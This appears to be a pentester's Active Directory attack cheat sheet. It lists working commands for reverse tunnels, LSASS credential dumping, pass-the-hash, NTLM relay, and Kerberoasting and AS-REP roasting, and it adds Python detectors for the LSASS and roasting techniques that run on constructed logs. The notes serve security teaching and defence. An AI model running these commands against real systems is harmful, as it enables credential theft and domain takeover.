Active Directory notes

This is a brief overview of my AD Mindmap. It's kinda rambly and is mostly just a dump of my notes, so I apologize if it's a bit hard to follow.

Basic thought: "if you can't go up, go out" -- if there is no local privesc, find more accounts to get hold of and reassess once the new assets have been pwn'd. If local privesc doesn't yield DC Admin, use it to find other local creds or domain creds, rinse and repeat.

Basically: gain an account. Can local privesc? If no, gain more accounts through other means. Can the new accounts local privesc or do DCSync? Does local LSASS have domain creds in it? If no, find even more accounts... and so on.

First things

  • Get Initial Access
  • Establish tunnel into network
    • Is SSH available?
      • ssh -N -R 9999 kali@192.168.1.1
        • With only a port after -R, OpenSSH opens a reverse dynamic (SOCKS) forward: port 9999 on the attack box proxies into the victim's network.
    • If no, use chisel!
      • Grab the platform-specific client release from the chisel GitHub releases page.
      • Infil it onto the remote host.
      • Run the server on attack: chisel server --port 8080 --reverse
      • On victim: chisel client <server IP>:8080 R:socks
      • This sets up a SOCKS5 proxy on port 1080 of the attack machine.

Going up...

  • Can get Local Privesc?
    • Reference the Windows Privesc Article
    • If yes, dump creds with mimikatz:
      • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
      • You can also do this with CME: crackmapexec smb 172.16.187.0/24 -u <local admin user> -H '<hash>' -M lsassy
        • The above tries to dump creds from every host in that range where the local admin hash works.
      • Do I have DC Admin hashes?
        • Can I crack them?
          • Use hashcat -m XXXX <hash file> <wordlist>
            • Run hashcat -h | grep -i <hash format> to find the mode number to put in place of XXXX.
        • Can I pass them?
          • SMB Client:
            • smbclient -L <IP/HOST> -U <username>%<hash> --pw-nt-hash
            • smbclient \\\\<IP/HOST>\\<SHARE> -U <username>%<hash> --pw-nt-hash
          • Crackmapexec and evil-winrm use the -H flag to accomplish this.
        • Can I pass the ticket?
      • If no DC Admin Hashes, do I have domain account hashes I can use to get onto another computer?
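Added defender-side example, not part of the original notes: a Python check over constructed Sysmon Event ID 10 (ProcessAccess) records that flags processes opening lsass.exe with PROCESS_VM_READ, the access right every credential dumper in the mimikatz/lsassy step above has to obtain. The allowlist of expected source images, the sample image paths, users and access masks are assumptions for the demonstration, not real telemetry.

```python
"""Flag suspicious handles to lsass.exe in Sysmon Event ID 10 (ProcessAccess) records.

Credential dumpers (mimikatz sekurlsa::*, lsassy, procdump-style tools) must
open lsass with read access to its memory, so the GrantedAccess mask is the
signal. Constructed sample events, not real telemetry.
"""
import json

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory

# Processes that legitimately open lsass with VM_READ on a typical host.
# Example allowlist (assumption): tune it to what your AV/EDR really does.
EXPECTED_SOURCES = {p.lower() for p in (
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\wininit.exe",
    r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",  # constructed path
)}

# Constructed sample: one JSON object per line with the Sysmon ProcessAccess fields.
SAMPLE_EVENTS = r"""
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF", "SourceUser": "NT AUTHORITY\\SYSTEM"}
{"EventID": 10, "SourceImage": "C:\\Users\\jdoe\\Downloads\\mimikatz.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010", "SourceUser": "CORP\\jdoe"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\taskmgr.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1400", "SourceUser": "CORP\\asmith"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\spoolsv.exe", "GrantedAccess": "0x1010", "SourceUser": "NT AUTHORITY\\SYSTEM"}
{"EventID": 10, "SourceImage": "C:\\Windows\\Temp\\procdump64.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF", "SourceUser": "CORP\\jdoe"}
"""


def parse_events(text):
    """Turn newline-delimited JSON into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def reads_lsass_memory(ev):
    """True when the event is a ProcessAccess on lsass.exe whose granted mask includes VM_READ."""
    target = ev.get("TargetImage", "").lower()
    if ev.get("EventID") != 10 or not target.endswith("\\lsass.exe"):
        return False
    mask = int(ev.get("GrantedAccess", "0x0"), 16)
    return bool(mask & PROCESS_VM_READ)


def suspicious_lsass_access(events, allowlist=EXPECTED_SOURCES):
    """Return (source_image, source_user, granted_access) for lsass memory reads
    by processes that are not on the allowlist. A 0x1400 query-only handle
    (Task Manager listing processes) does not trip the check."""
    hits = []
    for ev in events:
        if reads_lsass_memory(ev) and ev["SourceImage"].lower() not in allowlist:
            hits.append((ev["SourceImage"], ev["SourceUser"], ev["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    for image, user, access in suspicious_lsass_access(parse_events(SAMPLE_EVENTS)):
        print(f"[lsass-read] {image} as {user} with GrantedAccess {access}")
```

The check keys on the access mask rather than on a tool name, so a renamed mimikatz binary or a signed dumping utility is caught the same way; the allowlist is what keeps AV and the session-management processes from paging you.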

Going out (lateral movement)

  • No local privesc? Can you move laterally?
    • Internally vulnerable services?
      • E.g. run proxychains -q nmap -sT -vvv -Pn <internal IPs> through your tunnel and assess the internal network as normal (-sT because a SOCKS proxy only carries full TCP connections; -Pn because ping probes won't traverse it).
      • Internal services may use service accounts to access resources. If you can get a service to make SMB requests to arbitrary hosts, try this:
        • Can use responder to catch creds being passed around?
          • sudo responder -I <network iface>
        • Can use ntlmrelayx to relay them for RCE?
          • impacket-ntlmrelayx --no-http-server -smb2support -t <target IP> -c "<command>"
          • N.B. <command> can be a shell one-liner.
    • Have any discovered creds? Can password spray? Use CME
    • Can kerberoast?
      • cme ldap 192.168.0.104 -u <user> -p <pass> --kerberoasting output.txt
    • Can AS-REP roast?
      • cme ldap 192.168.0.104 -u <user> -p <pass> --asreproast output.txt
      • impacket-GetNPUsers <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
        • GetNPUsers requests AS-REPs for accounts with pre-authentication disabled, so it belongs here rather than under kerberoasting.
    • Ingest into BloodHound:
      • Can find a path to DCSync?
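Added defender-side example, not part of the original notes: a small Python detector that applies the Kerberoasting and AS-REP roasting indicators to constructed Windows Security events. It flags 4769 service-ticket requests encrypted with RC4 (0x17) for user-account SPNs when one requester pulls several of them, and 4768 TGT requests with pre-authentication type 0. Field names follow the Security event XML (TargetUserName, ServiceName, TicketEncryptionType, PreAuthType, Status, IpAddress); the sample records, accounts and addresses are made up.

```python
"""Flag Kerberoasting and AS-REP roasting patterns in Windows Security events.

Constructed sample events (not real logs): Kerberos service-ticket (4769) and
TGT (4768) records shaped like the fields the Security log exports. In 4769
the account is logged as user@REALM, in 4768 as the bare username.
"""
import json
from collections import defaultdict

RC4_HMAC = "0x17"  # RC4 ticket encryption: what roasting tools ask for so the hash cracks fast

# Constructed sample, one JSON object per line.
SAMPLE_EVENTS = """
{"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.25"}
{"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.25"}
{"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.25"}
{"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "FILESRV01$", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.40"}
{"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.40"}
{"EventID": 4768, "TargetUserName": "svc_legacy", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "PreAuthType": "0", "Status": "0x0", "IpAddress": "10.0.0.25"}
{"EventID": 4768, "TargetUserName": "asmith", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "PreAuthType": "2", "Status": "0x0", "IpAddress": "10.0.0.40"}
"""


def parse_events(text):
    """Turn newline-delimited JSON into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_roastable_tgs(ev):
    """4769 granted for a user-account service (not a machine account, not krbtgt), encrypted with RC4."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == 4769
            and ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType") == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def is_asrep_roast(ev):
    """4768 issued with no pre-authentication (PreAuthType 0) and an RC4-encrypted reply."""
    return (ev.get("EventID") == 4768
            and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType") == RC4_HMAC)


def detect(events, spn_threshold=3):
    """Return findings keyed by technique.

    kerberoast: (requester, source IP) pairs that pulled >= spn_threshold
    distinct RC4 service tickets. A single RC4 TGS is normal for a legacy app;
    a burst across many SPNs from one source is the roasting signature.
    asrep_roast: (account, source IP) pairs whose TGT was issued without pre-auth.
    """
    tgs_by_requester = defaultdict(set)
    asrep_accounts = []
    for ev in events:
        if is_roastable_tgs(ev):
            tgs_by_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
        elif is_asrep_roast(ev):
            asrep_accounts.append((ev["TargetUserName"], ev["IpAddress"]))
    kerberoast = {k: sorted(v) for k, v in tgs_by_requester.items() if len(v) >= spn_threshold}
    return {"kerberoast": kerberoast, "asrep_roast": asrep_accounts}


if __name__ == "__main__":
    findings = detect(parse_events(SAMPLE_EVENTS))
    for (user, ip), spns in findings["kerberoast"].items():
        print(f"[kerberoast] {user} from {ip} requested RC4 tickets for: {', '.join(spns)}")
    for account, ip in findings["asrep_roast"]:
        print(f"[asrep-roast] {account} has pre-auth disabled; TGT served to {ip}")
```

The same two events are what the fixes produce evidence against: enforcing AES on service accounts makes the 0x17 requests disappear (or stand out even more), and clearing "Do not require Kerberos preauthentication" removes the PreAuthType 0 entries at the source.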